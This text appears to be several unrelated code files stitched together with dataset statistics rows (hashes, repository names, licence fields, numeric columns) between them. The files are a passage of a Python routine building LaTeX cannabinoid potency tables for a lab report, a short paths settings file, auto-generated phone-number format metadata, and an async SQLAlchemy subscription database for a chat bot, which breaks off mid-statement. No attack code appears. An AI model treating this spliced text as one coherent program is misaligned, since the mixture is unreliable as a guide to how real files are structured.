thc_total = self.create_total_line('unit', 'basic', 'THC', data)
cbd_total = self.create_total_line('unit', 'basic', 'CBD', data)
recov_data = self.get_standard_recovery_values('Basic')
if unit_type == 'unit':
sample_type_1 = 'mg/g'
sample_type_2 = 'mg/unit'
elif unit_type == 'density':
sample_type_1 = 'mg/mL'
sample_type_2 = r'\%'
else:
sample_type_1 = r'\%'
sample_type_2 = r'\%'
basic_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$ \\
& (""" + sample_type_1 + r""") & (""" + sample_type_2 + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$ THC & """ + data[5][0] + r""" & """ + data[5][1] + r""" & ND & """ + recov_data[5] + r"""& """ + \
self.loq_dictionary[5] + r"""\\
$\Delta^{9}$ THC Acid & """ + data[6][0] + r""" & """ + data[6][1] + r""" & ND & """ + recov_data[
6] + r"""& """ + self.loq_dictionary[6] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total[0] + r"""} & \textbf{""" + thc_total[1] + r"""} & & &\\
\hline
\hline
$\Delta^{8}$ THC & """ + data[7][0] + r""" & """ + data[7][1] + r""" & ND & """ + recov_data[7] + r"""& """ + \
self.loq_dictionary[7] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & ND & N/A & N/A \\
\hline
Cannabidiol (CBD) &""" + data[1][0] + r""" & """ + data[1][1] + r""" & ND & """ + recov_data[1] + r"""& """ + \
self.loq_dictionary[1] + r"""\\
Cannabidiol Acid &""" + data[2][0] + r""" & """ + data[2][1] + r""" & ND & """ + recov_data[2] + r"""& """ + \
self.loq_dictionary[2] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total[0] + r"""} & \textbf{""" + cbd_total[1] + r"""} & & &\\
\hline
\hline
Cannabinol (CBN) & """ + data[3][0] + r""" & """ + data[3][1] + r""" & ND & """ + recov_data[3] + r"""& """ + \
self.loq_dictionary[3] + r"""\\
Cannabinol Acid & """ + data[4][0] + r""" & """ + data[4][1] + r""" & ND & """ + recov_data[4] + r"""& """ + \
self.loq_dictionary[4] + r"""\\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
return basic_potency_table_string
def generate_footer(self):
footer_string = r"""
Methods: solvent extraction; measured by UPLC-UV, tandem MS, P.I. 1.14 \& based on USP monograph 29 \newline
$\si{S_{o}}$ = standard deviation at zero analyte concentration. MDL generally considered to be 3x $\si{S_{o}}$ value. \newline\newline
ND = none detected. N/A = not applicable. THC = tetrahydrocannabinol.\newline
\textbf{*Total THC} = $\Delta^{9}$-THC + (THCA x 0.877 ). \textbf{**Total CBD} = CBD + (CBDA x 0.877).\newline\newline
Material will be held for up to 3 weeks unless alternative arrangements have been made. Sample holding time may vary and is dependent on MBL license restrictions.
\newline\newline\newline
R. Bilodeau \phantom{aaaaaaaaaaaaaaaaaaaaaaaaaxaaaaaasasssssssssssss}H. Hartmann\\ Analytical Chemist: \underline{\hspace{3cm}}{ \hspace{3.2cm} Sr. Analytical Chemist: \underline{\hspace{3cm}}
\fancyfoot[C]{\textbf{MB Laboratories Ltd.}\\ \textbf{Web:} www.mblabs.com}
\fancyfoot[R]{\textbf{Mail:} PO Box 2103\\ Sidney, B.C., V8L 356}
\fancyfoot[L]{\textbf{T:} 250 656 1334\\ \textbf{E:} info@mblabs.com}
\end{document}
"""
return footer_string
def round_down_to_correct_decimal_point(self, data_value):
if 100 > data_value >= 1:
data_value = str(data_value)[0:4]
elif 1 > data_value > 0:
data_value = str(data_value)[0:5]
elif data_value >= 100:
data_value = str(data_value)[0:3]
else:
data_value = 'ND'
return data_value
def create_total_line(self, total_line_type, report_type, cannabinoid, data):
if total_line_type == "unit":
if cannabinoid == 'THC':
if report_type == 'basic':
delta9 = data[5][0]
acid = data[6][0]
delta9_unit = data[5][1]
acid_unit = data[6][1]
else:
delta9 = data[11][0]
acid = data[16][0]
delta9_unit = data[11][1]
acid_unit = data[16][1]
if delta9 == 'ND':
delta9 = 0
if acid == 'ND':
acid = 0
if delta9_unit == 'ND':
delta9_unit = 0
if acid_unit == 'ND':
acid_unit = 0
total1 = float(delta9) + (float(acid) * 0.877)
total2 = float(delta9_unit) + (float(acid_unit) * 0.877)
if 100 > total1 >= 1:
total1 = str(total1)[0:4]
elif 1 > total1 > 0:
total1 = str(total1)[0:5]
elif total1 >= 100:
total1 = str(total1)[0:3]
else:
total1 = 'ND'
if 100 > total2 >= 1:
total2 = str(total2)[0:4]
elif 1 > total2 > 0:
total2 = str(total2)[0:5]
elif total2 >= 100:
total2 = str(total2)[0:3]
else:
total2 = 'ND'
return [total1, total2]
else:
if report_type == 'basic':
cbd = data[1][0]
acid = data[2][0]
cbd_unit = data[1][1]
acid_unit = data[2][1]
else:
cbd = data[5][0]
acid = data[7][0]
cbd_unit = data[5][1]
acid_unit = data[7][1]
if cbd == 'ND':
cbd = 0
if acid == 'ND':
acid = 0
if cbd_unit == 'ND':
cbd_unit = 0
if acid_unit == 'ND':
acid_unit = 0
total1 = float(cbd) + (float(acid) * 0.877)
total2 = float(cbd_unit) + (float(acid_unit) * 0.877)
if 100 > total1 >= 1:
total1 = str(total1)[0:4]
elif 1 > total1 > 0:
total1 = str(total1)[0:5]
elif total1 >= 100:
total1 = str(total1)[0:3]
else:
total1 = 'ND'
if 100 > total2 >= 1:
total2 = str(total2)[0:4]
elif 1 > total2 > 0:
total2 = str(total2)[0:5]
elif total2 >= 100:
total2 = str(total2)[0:3]
else:
total2 = 'ND'
return [total1, total2]
elif total_line_type == "regular":
if cannabinoid == 'THC':
if report_type == 'basic':
delta9 = data[5]
acid = data[6]
else:
delta9 = data[11]
acid = data[16]
if delta9 == 'ND':
delta9 = 0
if acid == 'ND':
acid = 0
total = float(delta9) + (float(acid) * 0.877)
if 100 > total >= 1:
total = str(total)[0:4]
elif 1 > total > 0:
total = str(total)[0:5]
elif total >= 100:
total = str(total)[0:3]
else:
total = 'ND'
return total
else:
if report_type == "basic":
cbd = data[1]
acid = data[2]
else:
cbd = data[5]
acid = data[7]
if cbd == 'ND':
cbd = 0
if acid == 'ND':
acid = 0
total = float(cbd) + (float(acid) * 0.877)
if 100 > total >= 1:
total = str(total)[0:4]
elif 1 > total > 0:
total = str(total)[0:5]
elif total >= 100:
total = str(total)[0:3]
else:
total = 'ND'
return total
| 61.386445
| 203
| 0.539864
| 5,934
| 51,626
| 4.346983
| 0.04213
| 0.064896
| 0.11793
| 0.053034
| 0.924792
| 0.881256
| 0.866214
| 0.830393
| 0.822252
| 0.753828
| 0
| 0.037324
| 0.32534
| 51,626
| 840
| 204
| 61.459524
| 0.703273
| 0.004688
| 0
| 0.700614
| 0
| 0.022086
| 0.1822
| 0.040547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02454
| false
| 0
| 0
| 0
| 0.046626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
857c388eec003a840321502b9c2f63819c6e92f3
| 117
|
py
|
Python
|
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
DATA_PATH = '/media/autolab/disk_4T/cyf/localization/data'
EXPER_PATH ='/media/autolab/disk_4T/cyf/localization/out'
| 39
| 58
| 0.803419
| 18
| 117
| 5
| 0.555556
| 0.2
| 0.355556
| 0.444444
| 0.822222
| 0.822222
| 0.822222
| 0
| 0
| 0
| 0
| 0.017857
| 0.042735
| 117
| 2
| 59
| 58.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.74359
| 0.74359
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
857c646d18b551c8368c06a8d35a42922cfbf94a
| 532
|
py
|
Python
|
python/phonenumbers/data/alt_format_381.py
|
rodgar-nvkz/python-phonenumbers
|
4c7c4892211dbc9bc328bc3356b03853eaf993dc
|
[
"Apache-2.0"
] | 2,424
|
2015-01-05T05:34:45.000Z
|
2022-03-28T22:37:53.000Z
|
python/phonenumbers/data/alt_format_381.py
|
rodgar-nvkz/python-phonenumbers
|
4c7c4892211dbc9bc328bc3356b03853eaf993dc
|
[
"Apache-2.0"
] | 166
|
2015-01-30T23:59:18.000Z
|
2022-03-14T21:08:42.000Z
|
Lib/site-packages/phonenumbers/data/alt_format_381.py
|
PsychedVic/Portafolio
|
4bd59d19de41fbea5317d4f2b9e6219ea0359945
|
[
"bzip2-1.0.6"
] | 345
|
2015-01-02T00:33:27.000Z
|
2022-03-26T13:06:57.000Z
|
"""Auto-generated file, do not edit by hand. 381 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_381 = [NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[16]|2[0-24-7]|3[0-8]|(?:2[389]|39)[2-9]']), NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1|2[0-24-7]|3[0-8]|(?:2[389]|39)[2-9]']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['6'])]
| 106.4
| 428
| 0.578947
| 96
| 532
| 3.114583
| 0.354167
| 0.046823
| 0.060201
| 0.210702
| 0.591973
| 0.58194
| 0.541806
| 0.45485
| 0.254181
| 0.254181
| 0
| 0.128257
| 0.06203
| 532
| 4
| 429
| 133
| 0.470942
| 0.101504
| 0
| 0
| 1
| 1
| 0.438559
| 0.349576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
858bc09426cf6ef21f9aca0841b4f653a02e3b56
| 44,049
|
py
|
Python
|
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | 2
|
2021-10-21T00:01:16.000Z
|
2021-12-16T14:13:55.000Z
|
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | null | null | null |
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | 1
|
2021-12-09T14:49:28.000Z
|
2021-12-09T14:49:28.000Z
|
# @Author: South
# @Date: 2021-08-14 10:56
from datetime import datetime
import nonebot
from sqlalchemy import Column, Integer, String, BLOB, DATETIME, select, distinct, func, Boolean, Text
from sqlalchemy.exc import NoResultFound, MultipleResultsFound
from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from src.utils.result import Result
global_config = nonebot.get_driver().config
__PROJECT_ROOT__ = global_config.project_root
try:
engine = create_async_engine(f"sqlite+aiosqlite:///{__PROJECT_ROOT__}/Hairpin.db", encoding="utf8",
pool_recycle=3600, pool_pre_ping=True, echo=False, future=True)
except Exception as exp:
import sys
nonebot.logger.opt(colors=True).critical(f"<r>创建数据库连接失败</r>, error: {repr(exp)}")
sys.exit("创建数据库连接失败")
async def database_init():
try:
# 初始化数据库结构
async with engine.begin() as conn:
await conn.run_sync(Base.metadata.create_all)
nonebot.logger.opt(colors=True).debug(f"<lc>初始化数据库...</lc><lg>完成</lg>")
except Exception as e:
import sys
nonebot.logger.opt(colors=True).critical(f"<r>数据库初始化失败</r>, error: {repr(e)}")
sys.exit("数据库初始化失败")
# 初始化化数据库
nonebot.get_driver().on_startup(database_init)
Base = declarative_base(engine)
class DB(object):
def __init__(self):
# expire_on_commit=False will prevent attributes from being expired
# after commit.
self.__async_session = sessionmaker(
engine, expire_on_commit=False, class_=AsyncSession
)
def get_async_session(self):
# 创建DBSession对象
return self.__async_session
class Dynamic_Record(Base):
__tablename__ = "Dynamic_Record"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
uid = Column(String(25), nullable=False, primary_key=False)
dynamic_id = Column(String(25), nullable=False, primary_key=False)
content = Column(BLOB, nullable=False, primary_key=False)
time = Column(DATETIME, nullable=False, primary_key=False, default=datetime.now)
def __init__(self, uid: str):
self.uid = uid
async def insert(self, dynamic_id: str, content: bytes, time=datetime.now()):
self.dynamic_id = dynamic_id
self.content = content
self.time = time
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select(dynamic_id)
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self, dynamic_id: str):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Dynamic_Record).where(
Dynamic_Record.dynamic_id == dynamic_id))
record = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=record)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_last_dynamic_id(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(func.max(Dynamic_Record.dynamic_id)).where(
Dynamic_Record.uid == self.uid))
record = session_result.scalar_one()
if record:
result = Result.IntResult(error=False, info="Exist", result=record)
else:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
class Dynamic_Subscription(Base):
__tablename__ = "Dynamic_Subscription"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
bot_id = Column(String(16), nullable=False, comment="Bot_id")
uid = Column(String(16), nullable=False, comment="B站UID")
subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
send_type = Column(String(10), nullable=False, comment="私聊/群")
def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
self.bot_id = bot_id
self.uid = uid
self.subscriber_id = subscriber_id
self.send_type = send_type
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Dynamic_Subscription):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Dynamic_Subscription).where(
Dynamic_Subscription.uid == self.uid).where(
Dynamic_Subscription.subscriber_id == self.subscriber_id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_subscribers(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Dynamic_Subscription).where(
Dynamic_Subscription.uid == self.uid))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
async def select_uids(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(distinct(Dynamic_Subscription.uid)))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Live_Subscription(Base):
__tablename__ = "Live_Subscription"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
bot_id = Column(String(16), nullable=False, comment="Bot_id")
uid = Column(String(16), nullable=False, comment="B站UID")
subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
send_type = Column(String(10), nullable=False, comment="1:QQ 2:群")
def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
self.bot_id = bot_id
self.uid = uid
self.subscriber_id = subscriber_id
self.send_type = send_type
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Live_Subscription):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Live_Subscription).where(
Live_Subscription.uid == self.uid).where(
Live_Subscription.subscriber_id == self.subscriber_id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_subscribers(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Live_Subscription).where(
Live_Subscription.uid == self.uid))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
async def select_uids(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(distinct(Live_Subscription.uid)))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Welcome_Subscription(Base):
__tablename__ = "Welcome_Subscription"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
subscriber_id = Column(String(16), nullable=False, comment="群号")
status = Column(Boolean, nullable=False, comment="状态")
content = Column(Text, nullable=False, comment="内容")
def __init__(self, subscriber_id: str, status: bool, content: str):
self.subscriber_id = subscriber_id
self.status = status
self.content = content
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Welcome_Subscription):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Welcome_Subscription).where(
Welcome_Subscription.subscriber_id == self.subscriber_id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_subscribers(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(
select(Welcome_Subscription).where(Welcome_Subscription.status == self.status))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Task_Subscription(Base):
__tablename__ = "Task_Subscription"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
bot_id = Column(String(16), nullable=False, comment="Bot_id")
subscriber_id = Column(String(16), nullable=False, comment="qq/群号")
interval_time = Column(Integer, nullable=False, comment="间隔时间")
content = Column(Text, nullable=False, comment="内容")
send_type = Column(String(10), nullable=False, comment="私聊/群")
def __init__(self, bot_id: str, subscriber_id: str, interval_time: int, content: str, send_type: str):
self.bot_id = bot_id
self.subscriber_id = subscriber_id
self.interval_time = interval_time
self.content = content
self.send_type = send_type
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select_by_self()
if not result.error and isinstance(result.result, Task_Subscription):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Task_Subscription).where(
Task_Subscription.id == self.id))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_all(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Task_Subscription))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
async def select_by_self(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(
select(Task_Subscription).where(
Task_Subscription.subscriber_id == self.subscriber_id).where(
Task_Subscription.bot_id == self.bot_id).where(Task_Subscription.id == self.id))
subscription = session_result.scalar_one()
result = Result.ListResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=["啥也没有"])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
async def select_all_by_self(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(
select(Task_Subscription).where(
Task_Subscription.subscriber_id == self.subscriber_id).where(
Task_Subscription.bot_id == self.bot_id))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
result = Result.ListResult(error=True, info=repr(e), result=[])
return result
class Recipes(Base):
__tablename__ = "Recipes"
id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
name = Column(String(16), nullable=False, comment="菜名")
content = Column(BLOB, nullable=False, primary_key=False, comment="图片")
def __init__(self, name: str, content: bytes):
self.name = name
self.content = content
async def insert(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and result.result == 1:
session.add(self)
result = Result.IntResult(error=False, info="Insert_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def delete(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
result = await self.select()
if not result.error and isinstance(result.result, Recipes):
await session.delete(result.result)
result = Result.IntResult(error=False, info="Delete_Success", result=1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
await session.commit()
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Recipes).where(
Recipes.name == self.name))
subscription = session_result.scalar_one()
result = Result.IntResult(error=False, info="Exist", result=subscription)
except NoResultFound:
result = Result.IntResult(error=False, info="Select_No_Result", result=1)
except MultipleResultsFound:
result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
except Exception as e:
result = Result.IntResult(error=True, info=repr(e), result=-1)
return result
async def select_all(self):
async_session = DB().get_async_session()
async with async_session() as session:
try:
async with session.begin():
try:
session_result = await session.execute(select(Recipes))
result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
except NoResultFound:
result = Result.ListResult(error=False, info="Select_No_Result", result=[])
except MultipleResultsFound:
result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
except Exception as e:
